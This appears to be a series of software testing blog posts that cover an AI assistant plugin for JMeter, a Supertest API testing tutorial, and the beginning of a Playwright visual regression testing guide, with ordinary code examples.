by Rajesh K | May 13, 2025 | Performance Testing, Blog, Latest Post |

Every application must handle heavy workloads without faltering. Performance testing, which measures an application’s speed, responsiveness, and stability under load, is essential to ensure a smooth user experience. Apache JMeter is one of the most popular open-source tools for load testing, but building complex test plans by hand can be time-consuming. What if you had an AI assistant inside JMeter to guide you? Feather Wand JMeter is exactly that: an AI-powered JMeter plugin (agent) that brings an intelligent chatbot right into the JMeter interface. It helps testers generate test elements, optimize scripts, and troubleshoot issues on the fly, effectively adding a touch of “AI magic” to performance testing. Let’s dive in!

What Is Feather Wand?



Feather Wand is a JMeter plugin that integrates an AI chatbot into JMeter’s UI. Under the hood, it uses Anthropic’s Claude (or OpenAI) API to power a conversational interface. When installed, a “Feather Wand” icon appears in JMeter, and you can ask it questions or give commands right inside your test plan. For example, you can ask how to model a user scenario, or instruct it to insert an HTTP Request Sampler for a specific endpoint. The AI will then guide you or even insert configured elements automatically. In short, Feather Wand lets you chat with AI in JMeter and receive smart suggestions as you design tests.

Key features include:

- Chat with AI in JMeter: Ask questions or describe a test scenario in natural language. Feather Wand will answer with advice, configuration tips, or code snippets.

- Smart Element Suggestions: The AI can recommend which JMeter elements (Thread Groups, Samplers, Timers, etc.) to use for a given goal.

- On-Demand JMeter Expertise: It can explain JMeter functions, best practices, or terminology instantly.

- Customizable Prompts: You can tweak how the AI behaves via configuration to fit your workflow (e.g. using your own prompts or parameters).



- AI-Generated Groovy Snippets: For advanced logic, the AI can generate code (such as Groovy scripts) for you to use in JMeter’s JSR223 samplers.

Think of Feather Wand as a virtual testing mentor: always available to lend a hand, suggest improvements, or even write boilerplate code so you can focus on real testing challenges.



Performance Testing 101

For readers new to this field, performance testing is a non-functional testing process that measures how an application performs under expected or heavy load, checking responsiveness, stability, and scalability. It reveals potential bottlenecks, such as slow database queries or CPU saturation, so they can be fixed before real users are impacted. By simulating different scenarios (load, stress, and spike testing), it answers questions like how many users the app can support and whether it remains responsive under peak conditions. These performance tests usually follow functional testing and track key metrics (like response time, throughput, and error rate) to gauge performance and guide optimization of the software and its infrastructure. Tools like Feather Wand, an AI-powered JMeter assistant, support these practices by generating test scripts and offering context-aware suggestions, making test creation and analysis faster and more efficient.
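As a rough illustration of the key metrics mentioned above, the sketch below computes average and 95th-percentile response time, throughput, and error rate from a list of request samples. The sample shape (`elapsedMs`, `success`) and the function name `summarize` are assumptions made for this example; this is not JMeter's own result format or reporting code.

```javascript
// Hypothetical sample shape: { elapsedMs: number, success: boolean }.
// Illustrative calculation only; JMeter's listeners compute these for you.
function summarize(samples, durationSeconds) {
  if (samples.length === 0 || durationSeconds <= 0) {
    throw new Error('need at least one sample and a positive duration');
  }
  const times = samples.map((s) => s.elapsedMs).sort((a, b) => a - b);
  const total = times.reduce((sum, t) => sum + t, 0);
  // Nearest-rank 95th percentile: smallest value with at least 95% of samples at or below it.
  const p95Index = Math.ceil(0.95 * times.length) - 1;
  const errors = samples.filter((s) => !s.success).length;
  return {
    avgResponseMs: total / times.length,
    p95ResponseMs: times[p95Index],
    throughputPerSec: samples.length / durationSeconds,
    errorRate: errors / samples.length,
  };
}

const report = summarize(
  [
    { elapsedMs: 120, success: true },
    { elapsedMs: 180, success: true },
    { elapsedMs: 950, success: false },
    { elapsedMs: 150, success: true },
  ],
  2 // length of the measurement window in seconds
);

console.log(report);
```

With these four samples, a single slow failing request pulls the average well above the typical response time, which is why percentiles and error rate are usually read alongside the average.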

Setting Up Feather Wand in JMeter

Ready to try Feather Wand? Below are the high-level steps to install and configure it in JMeter. These assume you already have Java and JMeter installed (if not, install a recent JDK and download Apache JMeter first).



Step 1: Install the JMeter Plugins Manager

The Feather Wand plugin is distributed via the JMeter Plugins ecosystem. First, download the Plugins Manager JAR from the official site and place it in

Then restart JMeter. After restarting, you should see a Plugins Manager icon (a puzzle piece) in the JMeter toolbar.







Step 2: Install the Feather Wand Plugin



Click the Plugins Manager icon. In the Available Plugins tab, search for “Feather Wand”. Select it and click Apply Changes (JMeter will download and install the plugin). Restart JMeter again. After this restart, a new Feather Wand icon (often a blue feather) should appear in the toolbar, indicating the plugin is active.





Step 3: Generate and Configure Your Anthropic API Key

Feather Wand’s AI features require an API key to call an LLM service (by default it uses Anthropic’s Claude). Sign up at the Anthropic console (or your chosen provider) and create a new API key. Copy the generated key.





Step 4: Add the API Key to JMeter

Open JMeter’s properties file (/bin/jmeter.properties) in a text editor. Add the following line, inserting your key:

Save the file. Restart JMeter one last time. Once JMeter restarts, the Feather Wand plugin will connect to the AI service using your key. You should now see the Feather Wand icon enabled. Click it to open the AI chat panel and start interacting with your new AI assistant.

That’s it. Feather Wand is ready to help you design and optimize performance tests. The plugin itself is free and open source, so you only pay for your API usage.

Sample Working Steps Using Feather Wand in JMeter

Let’s walk through a simple example to show how Feather Wand’s AI assistance improves the JMeter workflow. In this scenario, we use the plugin while building a basic login API test.









For this walkthrough, a basic Thread Group was created using APIs from the ReqRes website, covering GET, POST, and DELETE methods. Feather Wand, the AI assistant integrated into JMeter, was then used to optimize and manage the test plan through a few simple special commands.

Special Commands in Feather Wand



Clicking the AI Agent icon in JMeter opens a new chat window. In this window, you can interact with the AI using the following special commands:

- @this: Retrieves information about the currently selected element

- @optimize: Provides optimization suggestions for the test plan

- @lint: Renames test plan elements with meaningful names

- @usage: Shows AI usage statistics and interaction history

The following demonstrates how these commands can be used with existing HTTP Requests:







1) @this — Information About the Selected Element

Steps:

- Select any HTTP Request element in your test plan.

- In the AI chat window, type @this.

- Click Send.

Result:

The AI returns detailed information about the request, including its method, URL, headers, and body, and points out any missing configuration.



2) @optimize — Test Plan Improvements

When you run @optimize, the AI analyzes the selected elements and recommends improvements.

Examples of suggestions include:

- Add Response Assertions to validate expected behavior.

- Replace hardcoded values with JMeter variables (e.g., ${username}).

- Enable KeepAlive to reuse HTTP connections for better efficiency.

These suggestions help make the test plan more efficient and more reliable.





3) @lint — Auto-Renaming of Test Elements

@lint automatically renames vaguely named elements such as “HTTP Request 1”, based on the API path and request method.

Examples:

- HTTP Request → Login – POST /api/login

- HTTP Request 2 → Get User List – GET /api/users

As a result, the test plan is easier to read and maintain.





4) @usage — Viewing AI Interaction Stats

This command shows a summary of AI usage, including:

- Number of commands used

- Suggestions provided

- Elements renamed or optimized

- Estimated time saved using AI



5) AI-Suggested Test Steps & Navigation

- The AI suggests test steps based on the current structure of the test plan, and you can add them directly with a click.

- You can move between elements in the suggestion panel using the up/down arrow keys.

6) Sample Groovy Scripts – Easily Accessed Through AI

The Feather Wand AI provides ready-to-use Groovy scripts within the chat window. These scripts are adapted for the JMeter version being used.

Conclusion

Feather Wand is a capable AI assistant for JMeter, designed to save time, improve clarity, and raise the quality of test plans with a few simple commands. Whether you are debugging a single request or organizing a complex plan, it helps streamline the performance testing workflow. Though still in development, Feather Wand is being actively improved, with more intelligent automation and support for advanced testing scenarios expected in future releases.

Frequently Asked Questions

- Is Feather Wand free?

Yes, the plugin itself is free. You only pay for using the AI service via the Anthropic API.

- Do I need coding experience to use Feather Wand?

No, it's designed for beginners too. You can interact with the AI in plain English to generate scripts or understand configurations.

- Can Feather Wand replace manual test planning?

Not completely. It helps accelerate and guide test creation, but human validation is still important for edge cases and domain knowledge.

- What does the AI in Feather Wand actually do?

It answers queries, auto-generates JMeter test elements and scripts, offers optimization tips, and explains features, all in the context of your current plan.

- Is Feather Wand secure to use?

Yes, but ensure your API key is kept private. The plugin doesn’t collect or store your data; it simply sends queries to the AI provider and shows results.

by Rajesh K | May 9, 2025 | API Testing, Blog, Latest Post |

API testing is crucial for ensuring that your backend services work correctly and reliably. APIs often serve as the backbone of web and mobile applications, so catching bugs early through automated tests can save time and prevent costly issues in production. For Node.js developers and testers, the Supertest API library offers a powerful yet simple way to automate HTTP endpoint testing as part of your workflow. Supertest is a Node.js library (built on the Superagent HTTP client) designed specifically for testing web APIs. It allows you to simulate HTTP requests to your Node.js server and assert the responses without needing to run a browser or a separate client. This means you can test your RESTful endpoints directly in code, making it ideal for integration and end-to-end testing of your server logic. Developers and QA engineers favor Supertest because it is:

- Lightweight and code-driven – No GUI or separate app required, just JavaScript code.

- Seamlessly integrated with Node.js frameworks – Works great with Express or any Node HTTP server.

- Comprehensive – Lets you control headers, authentication, request payloads, and cookies in tests.

- CI/CD friendly – Easily runs in automated pipelines, returning standard exit codes on test pass/fail.

- Familiar to JavaScript developers – You write tests in JS/TS, using popular test frameworks like Jest or Mocha, so there’s no context-switching to a new language.

In this guide, we’ll walk through how to set up and use Supertest API for testing various HTTP methods (GET, POST, PUT, DELETE), validate responses (status codes, headers, and bodies), handle authentication, and even mock external API calls. We’ll also discuss how to integrate these tests into CI/CD pipelines and share best practices for effective API testing. By the end, you’ll be confident in writing robust API tests for your Node.js applications using Supertest.

Setting Up Supertest in Your Node.js Project

Before writing tests, you need to add Supertest to your project and set up a testing environment. Assuming you already have a Node.js application (for example, an Express app), follow these steps to get started:

- Install Supertest (and a test runner): Supertest is typically used with a testing framework like Jest or Mocha. If you don’t have a test runner set up, Jest is a popular choice for beginners due to its zero configuration. Install Supertest and Jest as development dependencies using npm:

```bash
npm install --save-dev supertest jest
```

This will add Supertest and Jest to your project’s node_modules. (If you prefer Mocha or another framework, you can install those instead of Jest.)

- Project Structure: Organize your tests in a dedicated directory. A common convention is to create a folder called tests or to put test files alongside your source files with a .test.js extension. For example:

```
my-project/
├── app.js              # Your Express app or server
└── tests/
    └── users.test.js   # Your Supertest test file
```

In this example, app.js exports an Express application (or Node HTTP server) which the tests will import. The test file users.test.js will contain our Supertest test cases.

- Configure the Test Script: If you’re using Jest, add a test script to your package.json (if not already present):

```json
"scripts": {
  "test": "jest"
}
```

This allows you to run all tests with the command npm test. (For Mocha, you might use "test": "mocha" accordingly.)

With Supertest installed and your project structured for tests, you’re ready to write your first API test.

Writing Your First Supertest API Test

Let’s create a simple test to make sure everything is set up correctly. In your test file (e.g., users.test.js), you’ll require your app and the Supertest library, then define test cases. For example:

```javascript
const request = require('supertest'); // import Supertest
const app = require('../app'); // import the Express app

describe('GET /api/users', () => {
  it('should return HTTP 200 and a list of users', async () => {
    const res = await request(app).get('/api/users'); // simulate GET request

    expect(res.statusCode).toBe(200); // assert status code is 200
    expect(res.body).toBeInstanceOf(Array); // assert response body is an array
  });
});
```

In this test, request(app) creates a Supertest client for the Express app. We then call .get('/api/users') and await the response. Finally, we use Jest’s expect to check that the status code is 200 (OK) and that the response body is an array (indicating a list of users).

Now, let’s dive deeper into testing various scenarios and features of an API using Supertest.

Testing Different HTTP Methods (GET, POST, PUT, DELETE)

Real-world APIs use multiple HTTP methods. Supertest makes it easy to test any request method by providing corresponding functions (.get(), .post(), .put(), .delete(), etc.) after calling request(app). Here’s how you can use Supertest for common HTTP methods:

```javascript
// Examples of testing different HTTP methods with Supertest:

// GET request (fetch list of users)
await request(app)
  .get('/users')
  .expect(200);

// POST request (create a new user with JSON payload)
await request(app)
  .post('/users')
  .send({ name: 'John' })
  .expect(201);

// PUT request (update user with id 1)
await request(app)
  .put('/users/1')
  .send({ name: 'John Updated' })
  .expect(200);

// DELETE request (remove user with id 1)
await request(app)
  .delete('/users/1')
  .expect(204);
```

In the above snippet, each request is crafted for a specific endpoint and method:

- GET /users should return 200 OK (perhaps with a list of users).

- POST /users sends a JSON body ({ name: 'John' }) to create a new user. We expect a 201 Created status in response.

- PUT /users/1 sends an updated name for the user with ID 1 and expects a 200 OK for a successful update.

- DELETE /users/1 attempts to delete user 1 and expects a 204 No Content (a common response for successful deletions).

Notice the use of .send() for POST and PUT requests – this method attaches a request body. Supertest (via Superagent) automatically sets the Content-Type: application/json header when you pass an object to .send(). You can also chain an .expect(statusCode) to quickly assert the HTTP status.

Sending Data, Headers, and Query Parameters

When testing APIs, you often need to send data or custom headers, or verify endpoints with query parameters. Supertest provides ways to handle all of these:

- Query Parameters and URL Path Params: Include them in the URL string. For example:

```javascript
// GET /users?role=admin (query string)
await request(app).get('/users?role=admin').expect(200);

// GET /users/123 (path parameter)
await request(app).get('/users/123').expect(200);
```

If your route uses query parameters or dynamic URL segments, constructing the URL in the request call is straightforward.

- Request Body (JSON or form data): Use .send() for JSON payloads (as shown above). To send URL-encoded form data, call .type('form') before .send(); for multipart forms and file uploads, Supertest (through Superagent) provides .field() and .attach(). However, for most API tests sending JSON via .send({…}) is sufficient. Just ensure your server is configured (e.g., with body-parsing middleware) to handle the content type you send.

- Custom Headers: Use .set() to set any HTTP header on the request. Common examples include setting an Accept header or authorization tokens. For instance:

```javascript
await request(app)
  .post('/users')
  .send({ name: 'Alice' })
  .set('Accept', 'application/json')
  .expect('Content-Type', /json/)
  .expect(201);
```

Here we set Accept: application/json to tell the server we expect a JSON response, and then we chain an expectation that the Content-Type of the response matches json. You can use .set() for any header your API might require (such as X-API-Key or custom headers).

Setting headers is also how you handle authentication in Supertest, which we’ll cover next.

Handling Authentication and Protected Routes

APIs often have protected endpoints that require authentication, such as a JSON Web Token (JWT) or an API key. To test these, you’ll need to include the appropriate auth credentials in your Supertest requests.

For example, if your API uses a Bearer token in the Authorization header (common with JWT-based auth), you can do:

```javascript
const token = 'your-jwt-token-here'; // Typically you'd generate or retrieve this in your test setup

await request(app)
  .get('/dashboard')
  .set('Authorization', `Bearer ${token}`)
  .expect(200);
```

In this snippet, we set the Authorization header before making a GET request to a protected /dashboard route. We then expect a 200 OK if the token is valid and the user is authorized. If the token is missing or incorrect, you could test for a 401 Unauthorized or 403 Forbidden status accordingly.

Tip: In a real test scenario, you might first call a login endpoint (using Supertest) to retrieve a token, then use that token for subsequent requests. You can utilize Jest’s beforeAll hook to obtain auth tokens or set up any required state before running the secured-route tests, and an afterAll to clean up after tests (for example, invalidating a token or closing database connections).

Validating Responses: Status Codes, Bodies, and Headers

Supertest makes it easy to assert various parts of the HTTP response. We’ve already seen using .expect(STATUS) to check status codes, but you can also verify response headers and body content.

You can chain multiple Supertest .expect calls for convenient assertions. For example:

```javascript
await request(app)
  .get('/users')
  .expect(200) // status code is 200
  .expect('Content-Type', /json/) // Content-Type header contains "json"
  .expect(res => {
    // Custom assertion on response body
    if (!res.body.length) {
      throw new Error('No users found');
    }
  });
```

Here we chain three expectations:

- The response status should be 200.

- The Content-Type header should match a regex /json/ (indicating JSON content).

- A custom function that throws an error if the res.body array is empty (which would fail the test). This demonstrates how to do more complex assertions on the response body; if the condition inside .expect(res => { … }) is not met, the test will fail with that error.

Alternatively, you can always await the request and use your test framework’s assertion library on the response object. For example, with Jest you could do:

```javascript
const res = await request(app).get('/users');

expect(res.statusCode).toBe(200);
expect(res.headers['content-type']).toMatch(/json/);
expect(res.body.length).toBeGreaterThan(0);
```

Both approaches are valid – choose the style you find more readable. Using Supertest’s chaining is concise for simple checks, whereas using your own expect calls on the res object can be more flexible for complex verification.
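Because `.expect()` accepts a function that receives the response and fails the test when it throws, a custom check can also be pulled out into a named helper and reused. The sketch below is one way to do that; the helper name `assertNonEmptyArrayBody` is hypothetical, and plain objects stand in for Supertest responses so the snippet runs on its own.

```javascript
// Hypothetical reusable assertion: throws if the response body is not a non-empty array.
// It has the (res) => void shape that can be passed to Supertest's .expect(fn).
function assertNonEmptyArrayBody(res) {
  if (!Array.isArray(res.body)) {
    throw new Error('Expected response body to be an array');
  }
  if (res.body.length === 0) {
    throw new Error('No users found');
  }
}

// Stand-in response objects; a real test would get these from request(app).get('/users').
const okResponse = { statusCode: 200, body: [{ id: 1, name: 'John' }] };
const emptyResponse = { statusCode: 200, body: [] };

assertNonEmptyArrayBody(okResponse); // passes silently

let failure = null;
try {
  assertNonEmptyArrayBody(emptyResponse);
} catch (err) {
  failure = err.message;
}

console.log(failure); // prints "No users found"
```

In a Supertest chain, the helper would be passed directly, as in `.expect(assertNonEmptyArrayBody)`.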

Testing Error Responses (Negative Testing)

It’s important to test not only the “happy path” but also how your API handles invalid input or error conditions. Supertest can help you simulate error scenarios and ensure your API responds correctly with the right status codes and messages.

For example, if your POST /users endpoint should return a 400 Bad Request when required fields are missing, you can write a test for that case:

```javascript
it('should return 400 when required fields are missing', async () => {
  const res = await request(app)
    .post('/users')
    .send({}); // sending an empty body, assuming "name" or other fields are required

  expect(res.statusCode).toBe(400);

  // Optionally, check that an error message is returned in the body
  expect(res.body.error).toBeDefined();
});
```

In this test, we intentionally send an incomplete payload (empty object) to trigger a validation error. We then assert that the response status is 400. You could also assert on the response body (for example, checking that res.body.error or res.body.message contains the expected error info).

Similarly, you might test a 404 Not Found for a GET with a non-existent ID, or 401 Unauthorized when hitting a protected route without credentials. Covering these negative cases ensures your API fails gracefully and returns expected error codes that clients can handle.
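One way to keep negative cases organized is a small table of payloads and the status each should produce. The sketch below uses a hypothetical `validateNewUser` function as a stand-in for the endpoint's validation logic so that it runs without a server; the validation rules are assumptions. In a real suite, each case would instead be sent with `request(app).post('/users').send(payload)`.

```javascript
// Hypothetical validation logic standing in for POST /users; the rules are assumptions.
function validateNewUser(body) {
  if (!body || typeof body.name !== 'string' || body.name.trim() === '') {
    return { status: 400, body: { error: 'name is required' } };
  }
  return { status: 201, body: { name: body.name.trim() } };
}

// Table of cases: payload in, expected status out.
const cases = [
  { label: 'empty body', payload: {}, expected: 400 },
  { label: 'blank name', payload: { name: '   ' }, expected: 400 },
  { label: 'wrong type', payload: { name: 42 }, expected: 400 },
  { label: 'valid user', payload: { name: 'John' }, expected: 201 },
];

// Run every case and record whether the actual status matched the expectation.
const results = cases.map(({ label, payload, expected }) => {
  const res = validateNewUser(payload);
  return { label, status: res.status, passed: res.status === expected };
});

console.log(results);
```

Adding a new negative case then means adding one row to the table rather than writing another test body.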

Mocking External API Calls in Tests

Sometimes your API endpoints call third-party services (for example, an external REST API). In your tests, you might not want to hit the real external service (to avoid dependencies, flakiness, or side effects). This is where mocking comes in.

For Node.js, a popular library for mocking HTTP requests is Nock. Nock can intercept outgoing HTTP calls and simulate responses, which pairs nicely with Supertest when your code under test makes HTTP requests itself.

To use Nock, install it first:

```bash
npm install --save-dev nock
```

Then, in your tests, you can set up Nock before making the request with Supertest. For example:

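```javascript
const nock = require('nock');
const request = require('supertest');
const app = require('../app');

it('responds using the mocked external API', async () => {
  // Mock the external API endpoint
  nock('https://api.example.com')
    .get('/data')
    .reply(200, { result: 'ok' });

  // Now make a request to your app (which calls the external API internally)
  const res = await request(app).get('/internal-route');

  expect(res.statusCode).toBe(200);
  expect(res.body.result).toBe('ok');
});
```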

In this way, when your application tries to reach api.example.com/data, Nock intercepts the call and returns the fake { result: 'ok' }. Our Supertest test then verifies that the app responded as expected without actually calling the real external service.

Best Practices for API Testing with Supertest

To get the most out of Supertest and keep your tests maintainable, consider the following best practices:

- Separate tests from application code: Keep your test files in a dedicated folder (like tests/) or use a naming convention like *.test.js. This makes it easier to manage code and ensures you don’t accidentally include test code in production builds. It also helps testing frameworks (like Jest) find your tests automatically.

- Use test data factories or generators: Instead of hardcoding data in your tests, generate dynamic data for more robust testing. For example, use libraries like Faker.js to create random user names, emails, etc. This can reveal issues that only occur with certain inputs and prevents all tests from using the exact same data. It keeps your tests closer to real-world scenarios.

- Test both success and failure paths: For each API endpoint, write tests for expected successful outcomes (200-range responses) and also for error conditions (4xx/5xx responses). Ensuring you have coverage for edge cases, bad inputs, and unauthorized access will make your API more reliable and bug-resistant.

- Clean up after tests: Tests should not leave the system in a dirty state. If your tests create or modify data (e.g., adding a user in the database), tear down that data at the end of the test or use setup/teardown hooks (beforeEach, afterEach) to reset state. This prevents tests from interfering with each other. Many testing frameworks allow you to reset database or app state between tests; use those features to isolate test cases.

- Use environment variables for configuration: Don’t hardcode sensitive values (like API keys, tokens, or database URLs) in your tests. Instead, use environment variables and perhaps a dedicated .env file for your test configuration. By using a package like dotenv, you can load test-specific environment variables (for example, pointing to a test database instead of production). This protects sensitive information and makes it easy to configure tests in different environments (local vs CI, etc.).

By following these practices, you’ll write tests that are cleaner, more reliable, and easier to maintain as your project grows.
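Two of these practices, test data factories and environment-based configuration, can be sketched without any extra libraries. The helper names (`buildUser`, `loadTestConfig`) and the variable names `TEST_BASE_URL` and `TEST_API_KEY` are assumptions for illustration; a library such as Faker.js could replace the hand-rolled values.

```javascript
// Hypothetical factory: returns a distinct user on each call, with optional overrides.
let userCounter = 0;
function buildUser(overrides = {}) {
  userCounter += 1;
  return {
    name: `Test User ${userCounter}`,
    email: `user${userCounter}@example.test`,
    ...overrides,
  };
}

// Hypothetical config loader: reads settings from environment variables
// (the variable names are assumptions) and falls back to local defaults.
function loadTestConfig(env = process.env) {
  return {
    baseUrl: env.TEST_BASE_URL || 'http://localhost:3000',
    apiKey: env.TEST_API_KEY || '',
  };
}

const first = buildUser();
const admin = buildUser({ role: 'admin' });
const config = loadTestConfig({ TEST_BASE_URL: 'http://localhost:4000' });

console.log(first.email, admin.role, config.baseUrl);
```

Passing the environment as a parameter keeps the loader easy to test; in normal use it would be called with no arguments so that it reads `process.env`.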

Supertest vs Postman vs Rest Assured: Tool Comparison

While Supertest is a great tool for Node.js API testing, you might wonder how it stacks up against other popular API testing solutions like Postman or Rest Assured. Here’s a quick comparison:

| S. No | Feature | Supertest (Node.js) | Postman (GUI Tool) | Rest Assured (Java) |
| --- | --- | --- | --- | --- |
| 1 | Language/Interface | JavaScript (code) | GUI + JavaScript (for tests via Newman) | Java (code) |
| 2 | Testing Style | Code-driven; integrated with Jest/Mocha | Manual + some automation (collections, Newman CLI) | Code-driven (uses JUnit/TestNG) |
| 3 | Speed | Fast (no UI overhead) | Medium (runs through an app or CLI) | Fast (runs in JVM) |
| 4 | CI/CD Integration | Yes (run with npm test) | Yes (using Newman CLI in pipelines) | Yes (part of build process) |
| 5 | Learning Curve | Low (if you know JS) | Low (easy GUI, scripting possible) | Medium (requires Java and testing frameworks) |
| 6 | Ideal Use Case | Node.js projects: embed tests in codebase for TDD/CI | Exploratory testing, sharing API collections, quick manual checks | Java projects: write integration tests in Java code |

In summary, Supertest shines for developers in the Node.js ecosystem who want to write programmatic tests alongside their application code. Postman is excellent for exploring and manually testing APIs (and it can do automation via Newman), but those tests live outside your codebase. Rest Assured is a powerful option for Java developers, but it requires a Java toolchain, so it is a poor fit for teams working only in Node.js. If you’re working with Node and want seamless integration with your development workflow and CI pipelines, Supertest is likely your best bet for API testing.

Conclusion

Automated API testing is a vital part of modern software development, and Supertest provides Node.js developers and testers with a robust, fast, and intuitive tool to achieve it. By integrating Supertest API tests into your development cycle, you can catch regressions early, ensure each endpoint behaves as intended, and refactor with confidence. We covered how to set up Supertest, write tests for various HTTP methods, handle things like headers, authentication, and external APIs, and even how to incorporate these tests into continuous integration pipelines.

Now it’s time to put this knowledge into practice. Set up Supertest in your Node.js project and start writing some tests for your own APIs. You’ll likely find that the effort pays off with more reliable code and faster debugging when things go wrong. Happy testing!

Frequently Asked Questions

- What is Supertest API?

Supertest API (or simply Supertest) is a Node.js library for testing HTTP APIs. It provides a high-level way to send requests to your web server (such as an Express app) and assert the responses. With Supertest, you can simulate GET, POST, PUT, DELETE, and other requests in your test code and verify that your server returns the expected status codes, headers, and data. It's widely used for integration and end-to-end testing of RESTful APIs in Node.js.

- Can Supertest be used with Jest?

Yes – Supertest works seamlessly with Jest. In fact, Jest is one of the most popular test runners to use with Supertest. You can write your Supertest calls inside Jest's it() blocks and use Jest’s expect function to make assertions on the response (as shown in the examples above). Jest also provides convenient hooks like beforeAll/afterAll which you can use to set up or tear down test conditions (for example, starting a test database or seeding data) before your Supertest tests run. While we've used Jest for examples here, Supertest is test-runner agnostic, so you could also use it with Mocha, Jasmine, or other frameworks in a similar way.

- How do I mock APIs when using Supertest?

You can mock external API calls by using a library like Nock to intercept them. Set up Nock in your test to fake the external service's response, then run your Supertest request as usual. This way, when your application tries to call the external API, Nock responds instead, allowing your test to remain fast and isolated from real external dependencies.

- How does Supertest compare with Postman for API testing?

Supertest and Postman serve different purposes. Supertest is a code-based solution — you write JavaScript tests and run them, which is perfect for integration into a development workflow and CI/CD. Postman is a GUI tool great for manually exploring endpoints, debugging, and sharing API collections, with the ability to write tests in the Postman app. You can automate Postman tests using its CLI (Newman), but those tests aren't part of your application's codebase. In contrast, Supertest tests live alongside your code, which means they can be version-controlled and run automatically on every code change. Postman is easier for quick manual checks or for teams that include non-developers, whereas Supertest is better suited for developers who want an automated testing suite integrated with their Node.js project.

by Rajesh K | May 8, 2025 | Automation Testing, Blog, Latest Post |

Playwright Visual Testing is an automated approach to verify that your web application’s UI looks correct and remains consistent after code changes. In modern web development, how your app looks is just as crucial as how it works. Visual bugs like broken layouts, overlapping elements, or wrong colors can slip through functional tests. This is where Playwright’s visual regression testing capabilities come into play. By using screenshot comparisons, Playwright helps catch unintended UI changes early in development, ensuring a pixel-perfect user experience across different browsers and devices. In this comprehensive guide, we’ll explain what Playwright visual testing is, why it’s important, and how to implement it. You’ll see examples of capturing screenshots and comparing them against baselines, learn about setting up visual tests in CI/CD pipelines, using thresholds to ignore minor differences, and performing cross-browser visual checks, and you’ll discover tools that enhance Playwright’s visual testing. Let’s dive in!

What is Playwright Visual Testing?

Playwright is an open-source end-to-end testing framework by Microsoft that supports multiple languages (JavaScript/TypeScript, Python, C#, Java) and all modern browsers. Playwright Visual Testing refers to using Playwright’s features to perform visual regression testing, that is, automatically detecting changes in the appearance of your web application. In simpler terms, it means taking screenshots of web pages or elements and comparing them to previously stored baseline images (expected appearance). If the new screenshot differs from the baseline beyond an acceptable threshold, the test fails, flagging a visual discrepancy.
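The comparison idea can be sketched in a few lines. This is not Playwright's implementation; it is a simplified illustration that counts differing pixels between two equally sized RGBA buffers and fails the check when the ratio exceeds a threshold. The function names and the 1% default threshold are assumptions.

```javascript
// Simplified illustration of baseline comparison; not Playwright's actual algorithm.
// Both images are flat RGBA byte arrays of equal length (4 bytes per pixel).
function diffPixelRatio(baseline, current) {
  if (
    baseline.length === 0 ||
    baseline.length !== current.length ||
    baseline.length % 4 !== 0
  ) {
    throw new Error('images must be non-empty RGBA buffers of the same size');
  }
  let differing = 0;
  for (let i = 0; i < baseline.length; i += 4) {
    const same =
      baseline[i] === current[i] &&
      baseline[i + 1] === current[i + 1] &&
      baseline[i + 2] === current[i + 2] &&
      baseline[i + 3] === current[i + 3];
    if (!same) differing += 1;
  }
  return differing / (baseline.length / 4);
}

// The check passes when the share of differing pixels stays within the threshold.
function matchesBaseline(baseline, current, maxRatio = 0.01) {
  return diffPixelRatio(baseline, current) <= maxRatio;
}

// A 2x2 white image, and a copy with its first pixel turned red.
const white = new Uint8Array(16).fill(255);
const changed = Uint8Array.from(white);
changed[1] = 0; // green channel of the first pixel
changed[2] = 0; // blue channel of the first pixel

console.log(diffPixelRatio(white, changed)); // 0.25
console.log(matchesBaseline(white, changed)); // false
console.log(matchesBaseline(white, white)); // true
```

Real comparison tools typically also tolerate small per-pixel color differences (for example from anti-aliasing), which this sketch deliberately leaves out.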

Visual testing focuses on the user interface aspect of quality. Unlike functional testing which asks “does it work correctly?”, visual testing asks “does it look correct?”. This approach helps catch:

- Layout shifts or broken alignment of elements

- CSS styling issues (colors, fonts, sizes)

- Missing or overlapping components

- Responsive design problems on different screen sizes

By incorporating visual checks into your test suite, you ensure that code changes (or even browser updates) haven’t unintentionally altered the UI. Playwright provides built-in commands for capturing and comparing screenshots, making visual testing straightforward without needing third-party addons. Next, we’ll explore why this form of testing is crucial for modern web apps.

Why Visual Testing Matters

Visual bugs can significantly impact user experience, yet they are easy to overlook if you’re only doing manual checks or writing traditional functional tests. Here are some key benefits and reasons why integrating visual regression testing with Playwright is important:

- Catch visual regressions early: Automated visual tests help you detect unintended design changes as soon as they happen. For example, if a CSS change accidentally shifts a button out of view, a visual test will catch it immediately before it reaches production.

- Ensure consistency across devices/browsers: Your web app should look and feel consistent on Chrome, Firefox, Safari, and across desktop and mobile. Playwright visual tests can run on all supported browsers and even emulate devices, validating that layouts and styles remain consistent everywhere.

- Save time and reduce human error: Manually checking every page after each release is tedious and error-prone. Automated visual testing is fast and repeatable – it can evaluate pages in seconds, flagging differences that a human eye might miss (especially subtle spacing or color changes). This speeds up release cycles.

- Increase confidence in refactoring: When developers refactor frontend code or update dependencies, there’s a risk of breaking the UI. Visual tests give a safety net – if something looks off, the tests will fail. This boosts confidence to make changes, knowing that visual regressions will be caught.

- Historical UI snapshots: Over time, you build a gallery of baseline images. These serve as a visual history of your application’s UI. They can provide insights into how design changes evolved and help decide if certain UI changes were beneficial or not.

- Complement functional testing: Visual testing fills the gap that unit or integration tests don’t cover. It ensures the application not only functions correctly but also appears correct. This holistic approach to testing improves overall quality.

In summary, Playwright Visual Testing matters because it guards the user experience. It empowers teams to deliver polished, consistent UIs with confidence, even as the codebase and styles change frequently.

How Visual Testing Works in Playwright

Now that we understand the what and why, let’s see how Playwright visual testing actually works. The process can be broken down into a few fundamental steps: capturing screenshots, creating baselines, comparing images, and handling results. Playwright’s test runner has snapshot testing built-in, so you can get started with minimal setup. Below, we’ll walk through each step with examples.

1. Capturing Screenshots in Tests

The first step is to capture a screenshot of your web page (or a specific element) during a test. Playwright makes this easy with its page.screenshot() method and assertions like expect(page).toHaveScreenshot(). You can take screenshots at key points, for example after the page loads or after performing some actions that change the UI.

In a Playwright test, capturing and verifying a screenshot can be done in one line using the toHaveScreenshot assertion. Here’s a simple example:

    // example.spec.js
    const { test, expect } = require('@playwright/test');

    test('homepage visual comparison', async ({ page }) => {
      await page.goto('https://example.com');
      await expect(page).toHaveScreenshot(); // captures and compares screenshot
    });

In this test, Playwright will navigate to the page and then take a screenshot of the viewport. On the first run, since no baseline exists yet, this command will save the screenshot as a baseline image (more on baselines in a moment). In subsequent runs, it will take a new screenshot and automatically compare it against the saved baseline.

